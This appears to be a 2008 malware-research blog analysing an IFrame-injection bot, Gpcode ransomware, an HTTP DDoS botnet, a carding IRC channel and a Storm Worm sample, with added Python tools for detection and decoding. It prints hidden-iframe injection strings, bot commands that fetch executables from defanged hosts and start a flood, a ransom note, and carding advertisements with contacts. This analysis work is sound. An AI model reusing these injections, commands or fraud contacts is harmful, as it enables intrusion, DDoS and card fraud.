IFrame Injection Attacks

Friday, June 13. 2008
Attacks against web servers are en vogue nowadays. These can be mass SQL injection attacks that insert malicious JavaScript into web sites, or other forms of IFrame injection attacks.

Today we analyzed a malware sample that performs such IFrame injection attacks. The executable with MD5 hash e3e3eb9e00745537a17311a48ddcfd6d is detected by Kaspersky as Backdoor.Win32.Agent.fjs and by ClamAV as PUA.Packed.NPack-3. When executed, the sample creates several files on the hard disk: it drops several benign DLLs such as wpcap.dll (part of WinPcap) and npptools.dll, which are all related to packet capture and processing. Furthermore, two executables, 3.tmp and 6.tmp, are created.

Then the file 6.tmp is executed with the following command line parameters:
-idx 0 -ip $IP-RANGE -port 80 -insert "<iframe src="hXXp://www.XXX.cn/index.htm" width=0 height=0 frameborder=0>"

The intention is that the infected machines scan the given network range for web servers on port 80 and then try to inject this IFrame into vulnerable servers.

An analysis of the injected site leads to more malware. The HTML file, for example, contains four more IFrames:
<iframe src="hXXp://www.XXX.cn/index.files/flash.htm" frameBorder=0 width=100 scrolling=no height=1>
<iframe src="hXXp://www.XXX.cn/index.files/real.htm" frameBorder=0 width=100 scrolling=no height=1>
<iframe src="hXXp://www.XXX.cn/index.files/614.htm" frameBorder=0 width=100 scrolling=no height=1>
<iframe src="hXXp://www.XXX.cn/web/index.htm" frameBorder=0 width=100 scrolling=no height=1>

As the names suggest, these IFrames contain exploits for well-known vulnerabilities in applications such as Flash or RealPlayer 11. Each of these exploits tries to install additional malware.
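The injected tags share the traits that make them easy to spot in served HTML: zero or one-pixel dimensions, no frame border, and a src pointing off-site. As an added example (not code from the post or from the sample analyzed here), the following scanner pulls every iframe out of a page and flags the ones that are sized to be invisible, hidden by CSS, or loading from a host outside the site's own. The sample page is constructed: it contains the injected tag and one of its nested tags exactly as the post defangs them (hXXp, XXX.cn), one visible same-site iframe for contrast, and one iframe hidden by style.

```python
from html.parser import HTMLParser
from urllib.parse import urlparse

# Constructed sample page: a visible same-site iframe, the post's injected tag
# and one of its nested tags (defanged as in the post), and an iframe hidden by CSS.
SAMPLE_HTML = """<html><body>
<h1>Welcome</h1>
<iframe src="https://www.example.org/player" width=560 height=315></iframe>
<p>Some content.</p>
<iframe src="hXXp://www.XXX.cn/index.htm" width=0 height=0 frameborder=0></iframe>
<iframe src="hXXp://www.XXX.cn/index.files/flash.htm" frameBorder=0 width=100 scrolling=no height=1></iframe>
<iframe src="/local/widget.html" style="display: none"></iframe>
</body></html>"""


def _dimension(value):
    """Turn a width/height attribute ('0', '1px', '100%') into a number; None if absent or unparseable."""
    if value is None:
        return None
    v = value.strip().lower()
    for suffix in ("px", "%"):
        if v.endswith(suffix):
            v = v[: -len(suffix)]
    try:
        return float(v)
    except ValueError:
        return None


class _IframeCollector(HTMLParser):
    """Collect the attribute dict of every <iframe> start tag, in document order."""

    def __init__(self):
        super().__init__()
        self.iframes = []

    def handle_starttag(self, tag, attrs):
        if tag == "iframe":  # HTMLParser already lowercases tag and attribute names
            self.iframes.append(dict(attrs))


def _hostname(src):
    # Treat the defanged hXXp scheme like http so urlparse still yields the host.
    if src[:4].lower() == "hxxp":
        src = "http" + src[4:]
    return urlparse(src).hostname  # lowercased; None for relative URLs


def find_hidden_iframes(html, own_hosts=()):
    """Return the iframes that are sized to be invisible, hidden by CSS, or that
    load from a host outside own_hosts (the hostnames the site legitimately uses)."""
    collector = _IframeCollector()
    collector.feed(html)
    allowed = {h.lower() for h in own_hosts}
    findings = []
    for attrs in collector.iframes:
        reasons = []
        width, height = _dimension(attrs.get("width")), _dimension(attrs.get("height"))
        if (width is not None and width <= 1) or (height is not None and height <= 1):
            reasons.append("tiny dimensions")
        style = (attrs.get("style") or "").replace(" ", "").lower()
        if "display:none" in style or "visibility:hidden" in style:
            reasons.append("hidden by style")
        src = attrs.get("src") or ""
        host = _hostname(src)
        if host and host not in allowed:
            reasons.append("off-site src host " + host)
        if reasons:
            findings.append({"src": src, "reasons": reasons})
    return findings
```

Run it over the HTML a server actually returns (fetched through a proxy or from disk), not over the files in the document root, since injections that happen at request time via a compromised module or database never show up in the static files.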

Gpcode.ak vs. CWSandbox

Tuesday, June 10. 2008
Recently a new variant of Gpcode was detected by the researchers from Kaspersky Lab. Gpcode is a form of ransomware, a pretty nasty form of malware that is used in extortion attempts. The basic idea of such malware is to encrypt certain files on the hard disk with a key known only to the attacker and then blackmail the victim into paying for their recovery.

Upon startup, Gpcode.ak searches for specific files on the disk (extensions include .htm, .jpg, and .inc) and encrypts them with a 1024-bit RSA key. Each file is then renamed to $ORIGINAL._CRYPT. Once this is finished, the malware displays a pop-up with the following text:
Your files are encrypted with RSA-1024 algorithm. To recovery your files you need to buy our decryptor. To buy decrypting tool contact us at: cipher4000@yahoo.com

Furthermore, a file named !READ_ME!.txt is created on the disk that contains the following text:
Your files are encrypted with RSA-1024 algorithm.
To recovery your files you need to buy our decryptor.
To buy decrypting tool contact us at: cipher4000@yahoo.com

=== BEGIN ===
AD7D6889
010200000168000000A400008EE1630FA688F194
42766F3AE19D5483AAE44C246F66C15F5C6D0E38
0B402EF1B67A0FF10A8A08CADB2DEA19EBD957EF
151ED9365CD730BE54263C3E2FDCEDF8546FF33E
5017032833DCB0C306EA28D79CD6DB4C0E7CE96D
3B84E83EEC84740FED2D64B672148E6F86B06B16
890102FF0D22AE42D3CD4B0F7D7E2AD0A5C0724C
=== END ===

Kaspersky Lab called for aid to "Help crack Gpcode", but I doubt that cracking this key will succeed: factoring a 1024-bit RSA modulus is far beyond any publicly demonstrated factoring effort, so without the attacker's private key the files stay encrypted. Dancho has some more info on Gpcode.ak in his blog. Furthermore, the full CWSandbox report is available.
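The data block in the ransom note can be read with the Microsoft CryptoAPI key-blob layout from wincrypt.h (BLOBHEADER: bType, bVersion, reserved, aiKeyAlg; for a SIMPLEBLOB followed by the ALG_ID of the wrapping key and the wrapped key bytes). The parser below is an added example written for this page, not code from the post, CWSandbox or Kaspersky, and the interpretation is mine: the seven 40-digit lines are 140 bytes whose header reads bType=1 (SIMPLEBLOB), bVersion=2, aiKeyAlg=CALG_RC4 and wrapping ALG_ID=CALG_RSA_KEYX, followed by exactly 128 bytes, i.e. an RC4 session key encrypted under a 1024-bit RSA key-exchange key. That is consistent with the usual hybrid construction (files encrypted with a symmetric key, the symmetric key encrypted with RSA) and shows why the note is useless without the attacker's private key. The short AD7D6889 line before the block does not parse as a blob header and is left aside.

```python
import struct

# Constants from Microsoft's wincrypt.h (CryptoAPI key blobs).
BLOB_TYPES = {0x01: "SIMPLEBLOB", 0x06: "PUBLICKEYBLOB",
              0x07: "PRIVATEKEYBLOB", 0x08: "PLAINTEXTKEYBLOB"}
ALG_IDS = {0x6601: "CALG_DES", 0x6602: "CALG_RC2", 0x6603: "CALG_3DES",
           0x660E: "CALG_AES_128", 0x6610: "CALG_AES_256", 0x6801: "CALG_RC4",
           0x2400: "CALG_RSA_SIGN", 0xA400: "CALG_RSA_KEYX"}
CUR_BLOB_VERSION = 0x02

# The seven 40-digit lines between === BEGIN === and === END === in the
# ransom note quoted above (the AD7D6889 line is not part of the blob).
NOTE_HEX = [
    "010200000168000000A400008EE1630FA688F194",
    "42766F3AE19D5483AAE44C246F66C15F5C6D0E38",
    "0B402EF1B67A0FF10A8A08CADB2DEA19EBD957EF",
    "151ED9365CD730BE54263C3E2FDCEDF8546FF33E",
    "5017032833DCB0C306EA28D79CD6DB4C0E7CE96D",
    "3B84E83EEC84740FED2D64B672148E6F86B06B16",
    "890102FF0D22AE42D3CD4B0F7D7E2AD0A5C0724C",
]


def parse_key_blob(hex_lines):
    """Parse a CryptoAPI key blob: BLOBHEADER {bType, bVersion, reserved, aiKeyAlg},
    then, for a SIMPLEBLOB, the ALG_ID of the wrapping key and the wrapped key bytes."""
    raw = bytes.fromhex("".join(line.strip() for line in hex_lines))
    if len(raw) < 8:
        raise ValueError("shorter than a BLOBHEADER")
    b_type, b_version, _reserved, key_alg = struct.unpack_from("<BBHI", raw, 0)
    if b_version != CUR_BLOB_VERSION:
        raise ValueError(f"not a CryptoAPI blob (version {b_version})")
    info = {"blob_type": BLOB_TYPES.get(b_type, f"0x{b_type:02X}"),
            "key_alg": ALG_IDS.get(key_alg, f"0x{key_alg:08X}")}
    if b_type == 0x01:  # SIMPLEBLOB: a session key encrypted under a key-exchange key
        if len(raw) < 12:
            raise ValueError("SIMPLEBLOB truncated before the wrapping ALG_ID")
        (wrap_alg,) = struct.unpack_from("<I", raw, 8)
        wrapped = raw[12:]
        info["wrap_alg"] = ALG_IDS.get(wrap_alg, f"0x{wrap_alg:08X}")
        info["wrapped_key_bits"] = len(wrapped) * 8  # equals the RSA modulus size for CALG_RSA_KEYX
        info["wrapped_key"] = wrapped
    else:
        info["body"] = raw[8:]
    return info


def is_cryptoapi_blob(hex_lines):
    """True if the lines parse as a version-2 CryptoAPI blob of a known type."""
    try:
        return parse_key_blob(hex_lines)["blob_type"] in BLOB_TYPES.values()
    except ValueError:
        return False
```

The same parser applies to any key material a Windows sample writes to disk or the registry, which is often the quickest way to tell whether a dropped blob is a wrapped session key, a public key, or a plaintext key worth recovering.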

HTTP-based Botnets

Saturday, June 7. 2008
We are observing more and more botnets that use HTTP-based communication channels. Quite often, these bots are used for DDoS attacks, as the following example shows. We recently analyzed a bot with CWSandbox (MD5: 112ccb580b0013f967b6ba991802850d) that first performs the usual steps of a bot infection, e.g., copying itself to the Windows system folder and adding registry keys so that the bot is started as a service after a reboot. The bot then issues the following HTTP request (obfuscated; the machine name and the host are replaced):
POST /ddd/stat.php HTTP/1.1
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Host: life-tablets.xxx
Content-Length: 27
Cache-Control: no-cache

id=xMACHINENAME_0&build_id=1362B8E


The answer from the server is:
HTTP/1.1 200 OK
Server: nginx
Date: Thu, 05 Jun 2008 19:59:13 GMT
Content-Type: text/html
Transfer-Encoding: chunked
Connection: close

fc
MTA7MjAwMDsxMDsxOzA7MzA7MTAwOzM7MjA7MTAwMDsy
MDAwI2dldCBodHRwOi8vZGZ0cmVvLmNvbS9sZi9lL2kuZXhl
O2dldCBodHRwOi8vZGZ0cmVvLmNvbS9sZi9lLzEwMDAuZXh
lO2dldCBodHRwOi8vbGlmZS10YWJsZXRzLmNuL2xmL2xvY
WQuZXhlO2Zsb29kIGljbXAgbGliZXJ0eXJlc2VydmVkaXJlY3R
vcnkuY29tIzEwIw==
0

The response is base64-encoded. Decoding it yields a configuration line of numeric parameters terminated by '#', followed by the (obfuscated) commands, separated by ';' and closed by a second '#' section:
10;2000;10;1;0;30;100;3;20;1000;2000#
get hxxp://dftreo.xxx/lf/e/i.exe;
get hxxp://dftreo.xxx/lf/e/1000.exe;
get hxxp://life-tablets.xxx/lf/load.exe;
flood icmp TARGET.COM#10#

Thus three additional malware binaries are downloaded and installed on the compromised machine, and the bot also starts an ICMP-based DDoS attack against the specified target.
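A decoder for this kind of answer, as an added example written for this page (not the bot's code and not CWSandbox output): it reassembles the chunked body, base64-decodes it, and splits the result into the configuration fields, the command list and the trailing section, so that the download URLs and flood targets can be pulled out automatically from a capture. The sample is constructed: the decoded command string from the post, with the author's obfuscated host names and target, is re-encoded into the same single-chunk base64 body the server sent. The meaning of the numeric configuration fields and of the trailing "10" is not stated in the post, so the decoder returns them as-is.

```python
import base64

# Constructed sample: the decoded command string shown above (obfuscated
# hosts and target kept), to be re-encoded into the bot's response shape.
SAMPLE_COMMANDS = (
    "10;2000;10;1;0;30;100;3;20;1000;2000#"
    "get hxxp://dftreo.xxx/lf/e/i.exe;"
    "get hxxp://dftreo.xxx/lf/e/1000.exe;"
    "get hxxp://life-tablets.xxx/lf/load.exe;"
    "flood icmp TARGET.COM#10#"
)


def build_chunked_body(payload: bytes) -> bytes:
    """Wrap payload as one base64 chunk followed by the terminating zero-length chunk."""
    b64 = base64.b64encode(payload)
    return b"%x\r\n%s\r\n0\r\n\r\n" % (len(b64), b64)


def dechunk(body: bytes) -> bytes:
    """Reassemble an HTTP/1.1 chunked transfer-encoded body."""
    out = bytearray()
    pos = 0
    while True:
        eol = body.index(b"\r\n", pos)
        size = int(body[pos:eol].split(b";")[0], 16)  # hex size; ignore chunk extensions
        pos = eol + 2
        if size == 0:
            return bytes(out)
        out += body[pos:pos + size]
        pos += size + 2  # skip the chunk data and its trailing CRLF


def parse_command(raw: str) -> dict:
    """Parse one bot command; unknown verbs are kept rather than dropped."""
    fields = raw.split()
    if not fields:
        raise ValueError("empty command")
    op = fields[0].lower()
    if op == "get" and len(fields) == 2:
        return {"op": "get", "url": fields[1]}
    if op == "flood" and len(fields) == 3:
        return {"op": "flood", "proto": fields[1].lower(), "target": fields[2]}
    return {"op": op, "args": fields[1:]}


def parse_bot_response(body: bytes) -> dict:
    """Decode the C&C answer: dechunk, base64-decode, split <config>#<cmd;cmd;...>#<trailer>#."""
    text = base64.b64decode(dechunk(body)).decode("ascii")
    parts = text.split("#")
    if len(parts) < 3:
        raise ValueError("unexpected command layout: " + text)
    config = [int(x) for x in parts[0].split(";") if x]
    commands = [parse_command(c) for c in parts[1].split(";") if c.strip()]
    return {
        "config": config,
        "commands": commands,
        "trailer": parts[2],
        "download_urls": [c["url"] for c in commands if c["op"] == "get"],
        "flood_targets": [c["target"] for c in commands if c["op"] == "flood"],
    }
```

Feeding the body straight from a pcap into parse_bot_response gives the list of URLs to fetch for further analysis and the DDoS targets to notify, which is usually the most useful output of a sandbox run for this class of bot.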

Good ol' #CCpower

Friday, June 6. 2008
A few weeks ago, one of our honeypots was compromised and the attacker installed an IRC bouncer on the machine. Nothing too spectacular, but nevertheless interesting, since we can then observe how the attackers communicate with each other and which channels they use. The interesting part is that the attackers joined one of the well-known carding channels, in which credit card info, PayPal accounts, PINs, and other stolen information is traded. Here is a small excerpt; the full dump is many megabytes in size:

- DonDax SELLING Selling USA/Europe VISA/MC DUMPS ,BANKS(halifax,HSBC etc ),Fulls(PIN,DOB,SSN),Paypals(email),EGOLD, and Cvv2's(worldwide). No ripping and NO TESTS.

- Hicks Cashout WESTERN UNION on UK LONDON / GREECE- ATHEENS !!!

- Hicks Selling dumps+pin new ones every week and FULLS ALSO !!!

- JuanesXloT I cash out Epic, your share 50%!! I also cash out Caja Madrid accounts, your share 50%! Looking for a good spammer to partner with, I have scams, your share 50%! Or if you have cards that work, made with 1010000... and can be cashed out

- M3ster If you want to buy yourself a root for: scan / flood / page / emech / psybnc, or maybe a remote desktop, shell, or maybe you want a site, I offer hosting, cc / paypal / spam / drones / bots, everything you need to

- Maka` I need email list all country big file on email list like 500 mb 1-2 gb if you have prv me

- d3x SELLING EU DUMPS WITH PIN [TRACK1/TRACK2+PIN] || PAYPAL ACCOUNTS WITH GOOD BALANCE [VERIFIED/UNVERIFIED] || FULLZ AND CVV2 [US/EU] || DONT WASTE MY TIME OR I WILL IGNORE YOU || FOR DEAL ICQ : 436306694

- traxpro Selling USA/Worldwide VISA/MC dumps from hotels. Natural track. Various bins are available. Offering tutorials, software and other additional info for all my clients.

- traxpro Spamming for HSBC, Halifax, CIBC. e-trade bank logins. Selling UK, USA, Swedish, Australian cvvs.

- Selling CVV, Checked and Verified 5$ each, E-gold and WU(for bigger orders) Accepted

- Charleskj I Need An Uploaded PHP Mailer That Sends To The Inbox, Whoever Has One PM Me, I Can Offer Many Things / Need A Php Mailer Uploaded That Sends Inbox , Who Have Please Prv Me , Can Offer Many Things !!!


Different people offer a diverse set of stolen credentials, which can then be abused; it is quite interesting to observe all the trading activity (although we can only see the advertisements and not the actual trades). Last year, Franklin et al. published a study entitled "An Inquiry into the Nature and Causes of the Wealth of Internet Miscreants". In this paper, the authors present an analysis of 13 million public IRC messages obtained from several networks and channels, collected over a 7-month period. The particular channel we observed is one of them; time for some analysis to validate their measurements...
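The first step of such an analysis is to turn the free-form advertisements into something countable: which goods a message offers, whether the poster is selling, buying, cashing out or spamming, and how to contact them. Franklin et al. do this with regular expressions over the message text; the classifier below is an added example in that spirit, written for this page with my own patterns and categories (not the paper's, and not the honeypot's tooling). The sample input is the excerpt above, as (nick, text) pairs.

```python
import re
from collections import Counter

# Sample input: advertisement lines from the channel excerpt above, as (nick, text).
SAMPLE_ADS = [
    ("DonDax", "SELLING Selling USA/Europe VISA/MC DUMPS ,BANKS(halifax,HSBC etc ),Fulls(PIN,DOB,SSN),Paypals(email),EGOLD, and Cvv2's(worldwide). No ripping and NO TESTS."),
    ("Hicks", "Cashout WESTERN UNION on UK LONDON / GREECE- ATHEENS !!!"),
    ("Maka`", "I need email list all country big file on email list like 500 mb 1-2 gb if you have prv me"),
    ("d3x", "SELLING EU DUMPS WITH PIN [TRACK1/TRACK2+PIN] || PAYPAL ACCOUNTS WITH GOOD BALANCE [VERIFIED/UNVERIFIED] || FULLZ AND CVV2 [US/EU] || DONT WASTE MY TIME OR I WILL IGNORE YOU || FOR DEAL ICQ : 436306694"),
    ("traxpro", "Spamming for HSBC, Halifax, CIBC. e-trade bank logins. Selling UK, USA, Swedish, Australian cvvs."),
    ("Charleskj", "Need A Php Mailer Uploaded That Sends Inbox , Who Have Please Prv Me , Can Offer Many Things !!!"),
]

# Goods taxonomy: category -> regex over the lowercased message (my own patterns).
GOODS = {
    "dumps": r"\bdumps?\b",
    "cvv": r"\bcvv2?s?\b",
    "fullz": r"\bfull[sz]\b",
    "pin": r"\bpin\b",
    "paypal": r"\bpaypals?\b",
    "bank_login": r"\bbanks?\b|\blogins?\b",
    "egold": r"\be-?gold\b",
    "email_list": r"\bemail list\b",
    "mailer": r"\bmailer\b",
}
# Role of the poster in the transaction, reported in this order.
ROLES = [
    ("sell", r"\bsell(ing)?\b"),
    ("buy", r"\bneed\b|\blooking for\b|\bbuying\b|\bi want\b"),
    ("cashout", r"\bcash\s?out\b"),
    ("spam", r"\bspam(ming|mer)?\b"),
]
ICQ_RE = re.compile(r"\bicq\s*[:#]?\s*(\d{5,10})\b", re.IGNORECASE)


def classify_ad(nick, text):
    """Label one channel message with the goods mentioned, the poster's role and any ICQ contact."""
    low = text.lower()
    goods = sorted(name for name, pat in GOODS.items() if re.search(pat, low))
    roles = [role for role, pat in ROLES if re.search(pat, low)]
    return {"nick": nick, "goods": goods, "roles": roles,
            "icq": ICQ_RE.findall(text), "is_ad": bool(goods or roles)}


def summarize(ads):
    """Tally goods categories and roles over a set of (nick, text) messages, as a channel-level view."""
    goods, roles = Counter(), Counter()
    for nick, text in ads:
        labels = classify_ad(nick, text)
        goods.update(labels["goods"])
        roles.update(labels["roles"])
    return {"goods": dict(goods), "roles": dict(roles)}
```

Over a multi-megabyte dump the interesting numbers are the ratio of sellers to buyers per category and how many distinct contacts reappear over time, which is the kind of measurement the paper reports and that this channel can be checked against.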

Storm Worm Dead?

Tuesday, June 3. 2008
The Internet Storm Center today ran a story about a "New Stormworm download site". The Storm Worm botnet is thus still alive and propagating. However, the size of the botnet is decreasing significantly: currently, only about 8.2K hosts are online within the network (based on measurements with the crawler presented in the LEET'08 paper). Compared to the size a few months ago (40K in January, and even more a few months earlier), this is a strong decrease. Will the botnet thus become obsolete in the near future?

The CWSandbox analysis of the Storm Worm sample loveyou.exe (MD5: 0679c17b9072d378cb0a39272fed98f5) shows the typical signs of a Storm sample: it first drops a file called C:\WINDOWS\farkrish.exe and also the typical peer list:

H:\WINDOWS\farkrish.config [peers] 000011213D362D29747E07640874096F = C933DDCB2E6E00
H:\WINDOWS\farkrish.config [peers] 01006C75C1523825A27A642FD05F6859 = BDA2AF3A4A3600
H:\WINDOWS\farkrish.config [peers] 02003727703C8435FA41B70F977E6055 = 53C8003932CD00
H:\WINDOWS\farkrish.config [peers] 0300B623D3499048CC4BB30B5857C959 = C86E5D666A2C00
H:\WINDOWS\farkrish.config [peers] 04000A4C7B4BBC41AE5B6B486A00F613 = 7B11B24647B600
H:\WINDOWS\farkrish.config [peers] 05002744C35A572A932662411A117715 = 7B150612413A00
H:\WINDOWS\farkrish.config [peers] 06000772D412A4727D1B415B7A73F450 = 183C4148226F00
H:\WINDOWS\farkrish.config [peers] 07000600822E65796C39356C6E3C750E = 7B12A2E745FA00
H:\WINDOWS\farkrish.config [peers] 0800F81A9A4D644D6566FC73591C0B5F = C925ECC4375C00
H:\WINDOWS\farkrish.config [peers] 090007168A1C884C2D60D12FD900D86E = 7D19C551116E00
H:\WINDOWS\farkrish.config [peers] 0A00C95E9909F25F7844635C9D0FAD62 = BDA663FA77E400
H:\WINDOWS\farkrish.config [peers] 0B00364A9F3CC648DC1EE87E0E022E70 = 53CB22366F8D00
H:\WINDOWS\farkrish.config [peers] 0C00C65A0A69484DDF47D724A81F3B52 = A007E95F321F00
H:\WINDOWS\farkrish.config [peers] 0D00DE0895137F5AC2376814D6415F4D = 40FEB3F7645700
H:\WINDOWS\farkrish.config [peers] 0E007A157B4A305BD352D1039829B24C = 43954E9F0F4D00
H:\WINDOWS\farkrish.config [peers] 0F00042A5F72C81BD16DDB4B7A38DD14 = 3EFBBF4273AC00
H:\WINDOWS\farkrish.config [peers] 1000A535661B0414FA6556507D75880A = CBDA9AA318CD00
H:\WINDOWS\farkrish.config [peers] 1100556AD128A56385603C71BF3A3476 = 4421178C717600
H:\WINDOWS\farkrish.config [peers] 12000A1B5609B740B609833F2C11B212 = C93AE62B6AFA00
H:\WINDOWS\farkrish.config [peers] 1300907BD345E730C048E311A3705B21 = 539C8C79473500
H:\WINDOWS\farkrish.config [peers] 1400FA75B31AF97F4564B80F49060C72 = 477196302BC400
H:\WINDOWS\farkrish.config [peers] 1500D1510455D5005746601F4E4A584F = BD9C1C33213F00
[...]
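A parser for this peer list, as an added example written for this page (not CWSandbox or Storm code). It assumes the entry layout described for Storm in the LEET'08 paper the post refers to: a 128-bit peer hash, then a 7-byte value consisting of the IPv4 address (4 bytes), the UDP port (2 bytes, read big-endian) and a 1-byte flag, all written as hex. The byte order of the port is taken from that description and is an assumption of this example. The input is the first three entries of the list above; the endpoint list it produces is what a crawler uses as seed peers and what a network team would turn into a blocklist.

```python
import re
from ipaddress import IPv4Address

# Sample input: the first three entries of the dropped peer list quoted above.
SAMPLE_PEER_LINES = [
    r"H:\WINDOWS\farkrish.config [peers] 000011213D362D29747E07640874096F = C933DDCB2E6E00",
    r"H:\WINDOWS\farkrish.config [peers] 01006C75C1523825A27A642FD05F6859 = BDA2AF3A4A3600",
    r"H:\WINDOWS\farkrish.config [peers] 02003727703C8435FA41B70F977E6055 = 53C8003932CD00",
]

PEER_RE = re.compile(r"\[peers\]\s+([0-9A-Fa-f]{32})\s*=\s*([0-9A-Fa-f]{14})\s*$")


def parse_peer_entry(line):
    """Decode one '[peers] <hash> = <value>' line, or return None if the line is not one.
    Assumed layout (Storm peer list as described in the LEET'08 paper): a 128-bit peer
    hash, and a 7-byte value = IPv4 address (4) || port (2, big-endian) || flag (1)."""
    m = PEER_RE.search(line)
    if not m:
        return None
    value = bytes.fromhex(m.group(2))
    return {"hash": m.group(1).upper(),
            "ip": str(IPv4Address(value[:4])),
            "port": int.from_bytes(value[4:6], "big"),
            "flag": value[6]}


def parse_peer_list(lines):
    """Parse every peer entry in a CWSandbox-style listing; lines that are not entries are skipped."""
    return [p for p in map(parse_peer_entry, lines) if p is not None]


def peer_endpoints(peers):
    """Sorted, de-duplicated ip:port strings, e.g. for a crawler seed list or a firewall blocklist."""
    return sorted({f"{p['ip']}:{p['port']}" for p in peers})
```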


Besides this, farkrish.exe is granted network access, and the infected machine syncs its time via NTP. The UDP packets that are sent out have the same structure as always:
0000  10 a6 e6 22 f9 ca cc b0 2d a2 8c c7 de 57 ba 53
0010  5e c5 e5 a6 17 02 48 31 46
Thus it seems that there are no major changes in this new update.